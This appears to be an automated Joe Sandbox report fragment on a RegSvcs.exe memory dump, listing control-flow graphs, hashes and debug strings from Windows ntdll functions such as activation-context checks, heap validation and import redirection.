                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
                                                                        • API String ID: 3446177414-4119021165
                                                                        • Opcode ID: 25e62db6ccfd91a38d0de763a9fc046aa8bea4977038166e5a9f7d0d2d3f2bdf
                                                                        • Instruction ID: 1fd993a88de25c54ef4fa11f429e33d45248513282b5dec1663ef79d0c63d8e2
                                                                        • Opcode Fuzzy Hash: 25e62db6ccfd91a38d0de763a9fc046aa8bea4977038166e5a9f7d0d2d3f2bdf
                                                                        • Instruction Fuzzy Hash: B6017572E552115ADF39AB2C790C7867B91B7CB728F05405AE948AF384DBE04CC5DB90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 272 1182890-11828b3 273 11828b9-11828cc 272->273 274 11ba4bc-11ba4c0 272->274 276 11828dd-11828df 273->276 277 11828ce-11828d7 273->277 274->273 275 11ba4c6-11ba4ca 274->275 275->273 278 11ba4d0-11ba4d4 275->278 280 11828e1-11828e5 276->280 277->276 279 11ba57e-11ba585 277->279 278->273 281 11ba4da-11ba4de 278->281 279->276 282 1182988-118298e 280->282 283 11828eb-11828fa 280->283 281->273 285 11ba4e4-11ba4eb 281->285 284 1182908-118290c 282->284 286 11ba58a-11ba58d 283->286 287 1182900-1182905 283->287 284->280 288 118290e-118291b 284->288 289 11ba4ed-11ba4f4 285->289 290 11ba564-11ba56c 285->290 286->284 287->284 291 11ba592-11ba599 288->291 292 1182921 288->292 294 11ba50b 289->294 295 11ba4f6-11ba4fe 289->295 290->273 293 11ba572-11ba576 290->293 303 11ba5a1-11ba5c9 call 1190050 291->303 296 1182924-1182926 292->296 293->273 297 11ba57c call 1190050 293->297 299 11ba510-11ba536 call 1190050 294->299 295->273 298 11ba504-11ba509 295->298 300 1182928-118292a 296->300 301 1182993-1182995 296->301 311 11ba55d-11ba55f 297->311 298->299 299->311 308 118292c-118292e 300->308 309 1182946-1182966 call 1190050 300->309 301->300 306 1182997-11829b1 call 1190050 301->306 321 1182969-1182974 306->321 308->309 314 1182930-1182944 call 1190050 308->314 309->321 318 1182981-1182985 311->318 314->309 321->296 323 1182976-1182979 321->323 323->303 324 118297f 323->324 324->318
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID:
                                                                        • API String ID: 48624451-0
                                                                        • Opcode ID: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                                                        • Instruction ID: 69707687f69e99cd1cb41684c8419a7aa1c1aa1f2a8deb61de72fea51323fc01
                                                                        • Opcode Fuzzy Hash: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                                                        • Instruction Fuzzy Hash: FF51D6B5E00116BFCF1AEB9D889097EFBF8BB49240714C169E465D7645E334DE50CBA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 325 115a250-115a26f 326 115a275-115a291 325->326 327 115a58d-115a594 325->327 329 115a297-115a2a0 326->329 330 11a79e6-11a79eb 326->330 327->326 328 115a59a-11a79bb 327->328 328->326 335 11a79c1-11a79c6 328->335 329->330 332 115a2a6-115a2ac 329->332 333 115a2b2-115a2b4 332->333 334 115a6ba-115a6bc 332->334 333->330 338 115a2ba-115a2bd 333->338 337 115a6c2 334->337 334->338 336 115a473-115a479 335->336 339 115a2c3-115a2c6 337->339 338->330 338->339 340 115a2c8-115a2d1 339->340 341 115a2da-115a2dd 339->341 344 11a79cb-11a79d5 340->344 345 115a2d7 340->345 342 115a6c7-115a6d0 341->342 343 115a2e3-115a32b 341->343 342->343 348 115a6d6-11a79ff 342->348 347 115a330-115a335 343->347 346 11a79da-11a79e3 call 11cf290 344->346 345->341 346->330 350 115a47c-115a47f 347->350 351 115a33b-115a343 347->351 348->346 355 115a34f-115a35d 350->355 356 115a485-115a488 350->356 354 115a345-115a349 351->354 351->355 354->355 357 115a59f-115a5a8 354->357 358 115a363-115a368 355->358 359 115a48e-115a49e 355->359 356->359 360 11a7a16-11a7a19 356->360 361 115a5c0-115a5c3 357->361 362 115a5aa-115a5ac 357->362 363 115a36c-115a36e 358->363 359->360 365 115a4a4-115a4ad 359->365 360->363 364 11a7a1f-11a7a24 360->364 367 11a7a01 361->367 368 115a5c9-115a5cc 361->368 362->355 366 115a5b2-115a5bb 362->366 369 115a374-115a38c call 115a6e0 363->369 370 11a7a26 363->370 371 11a7a2b 364->371 365->363 366->363 372 11a7a0c 367->372 368->372 373 115a5d2-115a5d5 368->373 378 115a4b2-115a4b9 369->378 379 115a392-115a3ba 369->379 370->371 375 11a7a2d-11a7a2f 371->375 372->360 373->362 375->336 377 11a7a35 375->377 380 115a3bc-115a3be 378->380 381 115a4bf-115a4c2 378->381 379->380 380->375 383 115a3c4-115a3cb 380->383 381->380 382 115a4c8-115a4d3 381->382 382->347 384 115a3d1-115a3d4 383->384 385 11a7ae0 383->385 387 115a3e0-115a3ea 384->387 386 11a7ae4-11a7afc call 11cf290 385->386 386->336 387->386 389 115a3f0-115a40c call 115a840 387->389 393 115a5d7-115a5e0 389->393 394 115a412-115a417 389->394 395 115a601-115a603 393->395 396 115a5e2-115a5eb 393->396 394->336 397 115a419-115a43d 394->397 400 115a605-115a623 call 1144508 395->400 401 115a629-115a631 395->401 396->395 398 115a5ed-115a5f1 396->398 399 115a440-115a443 397->399 402 115a5f7-115a5fb 398->402 403 115a681-115a6ab RtlDebugPrintTimes 398->403 404 115a449-115a44c 399->404 405 115a4d8-115a4dc 399->405 400->336 400->401 402->395 402->403 403->395 422 115a6b1-115a6b5 403->422 409 115a452-115a454 404->409 410 11a7ad6 404->410 407 11a7a3a-11a7a42 405->407 408 115a4e2-115a4e5 405->408 412 115a634-115a64a 407->412 413 11a7a48-11a7a4c 407->413 408->412 414 115a4eb-115a4ee 408->414 416 115a520-115a539 call 115a6e0 409->416 417 115a45a-115a461 409->417 410->385 418 115a4f4-115a50c 412->418 419 115a650-115a659 412->419 413->412 420 11a7a52-11a7a5b 413->420 414->404 414->418 434 115a53f-115a567 416->434 435 115a65e-115a665 416->435 423 115a467-115a46c 417->423 424 115a57b-115a582 417->424 418->404 428 115a512-115a51b 418->428 419->409 426 11a7a5d-11a7a60 420->426 427 11a7a85-11a7a87 420->427 422->395 423->336 425 115a46e 423->425 424->387 430 115a588 424->430 425->336 431 11a7a6e-11a7a71 426->431 432 11a7a62-11a7a6c 426->432 427->412 433 11a7a8d-11a7a96 427->433 428->409 430->385 439 11a7a7e 431->439 440 11a7a73-11a7a7c 431->440 438 11a7a81 432->438 433->409 436 115a569-115a56b 434->436 435->436 437 115a66b-115a66e 435->437 436->423 442 115a571-115a573 436->442 437->436 441 115a674-115a67c 437->441 438->427 439->438 440->433 441->399 443 11a7a9b-11a7aa4 442->443 444 115a579 442->444 443->444 445 11a7aaa-11a7ab0 443->445 444->424 445->444 446 11a7ab6-11a7abe 445->446 446->444 447 11a7ac4-11a7acf 446->447 447->446 448 11a7ad1 447->448 448->444
                                                                        Strings
                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A79FA
                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 011A79D0, 011A79F5
                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A79D5
                                                                        • SsHd, xrefs: 0115A3E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                        • API String ID: 0-929470617
                                                                        • Opcode ID: 324921623a2b83e2d0cb2e2afe791def0c5cb29416618f57ee9ebe1d06a9c328
                                                                        • Instruction ID: 52423d6c407b3964c71fa837166ba06f6664a8c0155fc486e0806ee415102790
                                                                        • Opcode Fuzzy Hash: 324921623a2b83e2d0cb2e2afe791def0c5cb29416618f57ee9ebe1d06a9c328
                                                                        • Instruction Fuzzy Hash: 38E1F170648302CFD76DCE68D494B6ABFE1AF84268F080B2DED658B291D731D945CB92

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 449 115d770-115d7ab 450 115d9e7-115d9ee 449->450 451 115d7b1-115d7bb 449->451 450->451 452 115d9f4-11a932c 450->452 453 115d7c1-115d7ca 451->453 454 11a9357 451->454 452->451 459 11a9332-11a9337 452->459 453->454 455 115d7d0-115d7d3 453->455 460 11a9361-11a9370 454->460 457 115d7d9-115d7db 455->457 458 115d9da-115d9dc 455->458 457->454 461 115d7e1-115d7e4 457->461 458->461 463 115d9e2 458->463 462 115d927-115d938 call 1184c30 459->462 464 11a934b-11a9354 call 11cf290 460->464 461->454 465 115d7ea-115d7ed 461->465 463->465 464->454 468 115d7f3-115d7f6 465->468 469 115d9f9-115da02 465->469 472 115da0d-115da16 468->472 473 115d7fc-115d848 call 115d660 468->473 469->468 474 115da08-11a9346 469->474 472->473 477 115da1c 472->477 473->462 479 115d84e-115d852 473->479 474->464 477->460 479->462 480 115d858-115d85f 479->480 481 115d865-115d869 480->481 482 115d9d1-115d9d5 480->482 484 115d870-115d87a 481->484 483 11a9563-11a957b call 11cf290 482->483 483->462 484->483 485 115d880-115d887 484->485 488 115d8ed-115d90d 485->488 489 115d889-115d88d 485->489 490 115d910-115d913 488->490 491 115d893-115d898 489->491 492 11a9372 489->492 493 115d915-115d918 490->493 494 115d93b-115d940 490->494 495 11a9379-11a937b 491->495 496 115d89e-115d8a5 491->496 492->495 499 11a9559-11a955e 493->499 500 115d91e-115d920 493->500 501 115d946-115d949 494->501 502 11a94d3-11a94db 494->502 495->496 503 11a9381-11a93aa 495->503 497 11a93ea-11a93ed 496->497 498 115d8ab-115d8e3 call 1188250 496->498 505 11a93f1-11a9400 call 11982c0 497->505 523 115d8e5-115d8e7 498->523 499->462 506 115d971-115d98c call 115a6e0 500->506 507 115d922 500->507 508 115da21-115da2f 501->508 509 115d94f-115d952 501->509 502->508 510 11a94e1-11a94e5 502->510 503->488 511 11a93b0-11a93ca call 11982c0 503->511 533 11a9402-11a9410 505->533 534 11a9417 505->534 530 11a9528-11a952d 506->530 531 115d992-115d9ba 506->531 507->462 513 115da35-115da3e 508->513 514 115d954-115d964 508->514 509->493 509->514 510->508 518 11a94eb-11a94f4 510->518 511->523 528 11a93d0-11a93e3 511->528 513->500 514->493 519 115d966-115d96f 514->519 520 11a9512-11a9514 518->520 521 11a94f6-11a94f9 518->521 519->500 520->508 532 11a951a-11a9523 520->532 526 11a94fb-11a9501 521->526 527 11a9503-11a9506 521->527 523->488 529 11a9420-11a9424 523->529 526->520 535 11a9508-11a950d 527->535 536 11a950f 527->536 528->511 537 11a93e5 528->537 529->488 541 11a942a-11a9430 529->541 538 115d9bc-115d9be 530->538 539 11a9533-11a9536 530->539 531->538 532->500 533->505 540 11a9412 533->540 534->529 535->532 536->520 537->488 542 115d9c4-115d9cb 538->542 543 11a9549-11a954e 538->543 539->538 544 11a953c-11a9544 539->544 540->488 545 11a9432-11a944f 541->545 546 11a9457-11a9460 541->546 542->482 542->484 543->462 549 11a9554 543->549 544->490 545->546 550 11a9451-11a9454 545->550 547 11a9462-11a9467 546->547 548 11a94a7-11a94a9 546->548 547->548 551 11a9469-11a946d 547->551 552 11a94ab-11a94c6 call 1144508 548->552 553 11a94cc-11a94ce 548->553 549->499 550->546 554 11a946f-11a9473 551->554 555 11a9475-11a94a1 RtlDebugPrintTimes 551->555 552->462 552->553 553->462 554->548 554->555 555->548 559 11a94a3 555->559 559->548
                                                                        APIs
                                                                        Strings
                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A936B
                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 011A9341, 011A9366
                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011A9346
                                                                        • GsHd, xrefs: 0115D874
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                        • API String ID: 3446177414-576511823
                                                                        • Opcode ID: 401ae3370b0c5a32e0d0ee738ff885217a66125954aa94d5c7e24e0312145923
                                                                        • Instruction ID: ee7b41f25219f4340627f9e2922f143b5d9fa8d3436265d46a64239936c3f967
                                                                        • Opcode Fuzzy Hash: 401ae3370b0c5a32e0d0ee738ff885217a66125954aa94d5c7e24e0312145923
                                                                        • Instruction Fuzzy Hash: ECE1C474608346CFDB5CCFA8D480B6ABBF5BF88318F44492DE9A58B281D771D984CB42

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 560 118b5ec-118b5fc 561 118b5fe 560->561 562 118b600-118b602 560->562 561->562 563 118b608-118b60d 562->563 564 118b830-118b844 call 1184b87 562->564 566 118b60f-118b612 563->566 567 118b621-118b62e 563->567 566->564 569 118b618-118b61b 566->569 570 118b631-118b63d call 118b5e6 567->570 569->564 569->567 573 118b64a-118b653 570->573 574 118b63f-118b644 570->574 576 118b65a-118b65d 573->576 577 118b655-118b658 573->577 574->574 575 118b646-118b648 574->575 575->570 578 118b65f-118b662 576->578 579 118b665-118b66d 576->579 577->578 578->579 580 118b66f-118b672 579->580 581 118b690-118b693 579->581 584 118b67c-118b680 580->584 585 118b674 580->585 582 118b6ad-118b6d4 call 1186810 581->582 583 118b695-118b698 581->583 595 118b6d7-118b6e9 call 118b5e6 582->595 583->582 586 118b69a-118b69e 583->586 589 118b68a-118b68d 584->589 590 118b682-118b684 584->590 588 118b676-118b67a 585->588 591 118b6a0-118b6a2 586->591 592 118b6a4-118b6aa 586->592 588->582 589->581 590->589 594 118b686-118b688 590->594 591->582 591->592 592->582 594->588 598 118b6eb-118b6f1 595->598 599 118b6f3-118b704 call 118b5e6 595->599 600 118b71b-118b727 598->600 608 118b70a-118b713 599->608 609 118b791-118b794 599->609 602 118b729-118b735 600->602 603 118b797 600->603 605 118b766-118b769 602->605 606 118b737 602->606 607 118b79a-118b79e 603->607 616 118b76c-118b786 call 1186580 605->616 612 118b739-118b73c 606->612 613 118b73e-118b741 606->613 614 118b7ad-118b7b0 607->614 615 118b7a0-118b7a2 607->615 610 118b718 608->610 611 118b715 608->611 609->603 610->600 611->610 612->605 612->613 619 118b743-118b746 613->619 620 118b757-118b762 613->620 621 118b7df-118b7ed call 11cd8b0 614->621 622 118b7b2-118b7b5 614->622 617 118b7a4 615->617 618 118b7a7-118b7ab 615->618 631 118b789-118b78c 616->631 617->618 626 118b815-118b81a 618->626 619->620 627 118b748-118b74e 619->627 620->607 630 118b764 620->630 640 118b7ef-118b7f5 621->640 641 118b7f7-118b7fa 621->641 628 118b80f 622->628 629 118b7b7-118b7ba 622->629 637 118b81c 626->637 638 118b81e-118b821 626->638 627->616 633 118b750 627->633 634 118b812 628->634 635 118b7bc-118b7c1 629->635 636 118b7ce-118b7d3 629->636 630->631 631->595 633->620 642 118b752-118b755 633->642 634->626 635->621 643 118b7c3-118b7c6 635->643 636->628 639 118b7d5 636->639 637->638 644 118b829-118b82f 638->644 645 118b823-118b827 638->645 639->621 646 118b7d7-118b7dd 639->646 640->626 647 118b7fc-118b803 641->647 648 118b805-118b80d 641->648 642->616 642->620 643->634 649 118b7c8-118b7ca 643->649 645->644 646->621 646->634 647->626 648->626 649->621 650 118b7cc 649->650 650->634
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                        • Instruction ID: fe45715b8f8d229e94fc45f6a92100cda8e7df24535097717a438fc5954938b5
                                                                        • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                        • Instruction Fuzzy Hash: 9681D170E196498EEF2DBE6CC8507FEBBB1AF46324F28C119D861A72D1C73498408F59
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: $$@
                                                                        • API String ID: 3446177414-1194432280
                                                                        • Opcode ID: 7aa1fe4d7e1da5b7812250bd830ddf7d03d61e3eda0b1247d7346a1bb01ae61a
                                                                        • Instruction ID: 43bc7339d5a2aecf149d4202c4e6b2eb593f6aca23cc6093a1b3160a2ecdd6d4
                                                                        • Opcode Fuzzy Hash: 7aa1fe4d7e1da5b7812250bd830ddf7d03d61e3eda0b1247d7346a1bb01ae61a
                                                                        • Instruction Fuzzy Hash: 94812C75D002699BDB39DB54CC44BEEBBB8AF08754F0041EAEA19B7280D7705E85CFA1
                                                                        APIs
                                                                        • RtlDebugPrintTimes.NTDLL ref: 0116D959
                                                                          • Part of subcall function 01144859: RtlDebugPrintTimes.NTDLL ref: 011448F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: $$$$p/$*
                                                                        • API String ID: 3446177414-332567944
                                                                        • Opcode ID: 78a586c1a94789e04be40f25134a764caf7d1f037a9cba14660544c91e3de304
                                                                        • Instruction ID: a0fca8f4e6946f288719047a646ed4b94798f5b3c16c7ec69522795d7f85b0ca
                                                                        • Opcode Fuzzy Hash: 78a586c1a94789e04be40f25134a764caf7d1f037a9cba14660544c91e3de304
                                                                        • Instruction Fuzzy Hash: 9A51E071A0034ADFDF2CDFA8E48879DBBB5BF44318F144159D8456B285D7719991CB80
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: 0Ivw$0Ivw$0Ivw$X
                                                                        • API String ID: 3446177414-3775388739
                                                                        • Opcode ID: 58432ae8e399292da5243744d365342a8cf444939e80b80ff764f667734c567a
                                                                        • Instruction ID: 33b3efc228b2ac38386493a28312cacedfb9aaf3ff88c8cd004e47d5aa4603a6
                                                                        • Opcode Fuzzy Hash: 58432ae8e399292da5243744d365342a8cf444939e80b80ff764f667734c567a
                                                                        • Instruction Fuzzy Hash: 9831B431D0420AEBCF26EF58E844B8DBBB5ABC5758F018059FD056A251E7B0CA90CF45
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                        • API String ID: 3446177414-56086060
                                                                        • Opcode ID: 0811baf472a3f239f348f5f2376c7d2d2b47689e857b38d9abce27601404059a
                                                                        • Instruction ID: f2dcf5f8d531f4c4690b6e19abe14735880e680b2e8ee363ec2161f661a82657
                                                                        • Opcode Fuzzy Hash: 0811baf472a3f239f348f5f2376c7d2d2b47689e857b38d9abce27601404059a
                                                                        • Instruction Fuzzy Hash: 10418771700742DFDB2EDF68C489BAEBBB8EF42324F058069E54687395CB75A881C791
                                                                        APIs
                                                                        Strings
                                                                        • LdrpCheckRedirection, xrefs: 011C488F
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 011C4899
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011C4888
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                                        • Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
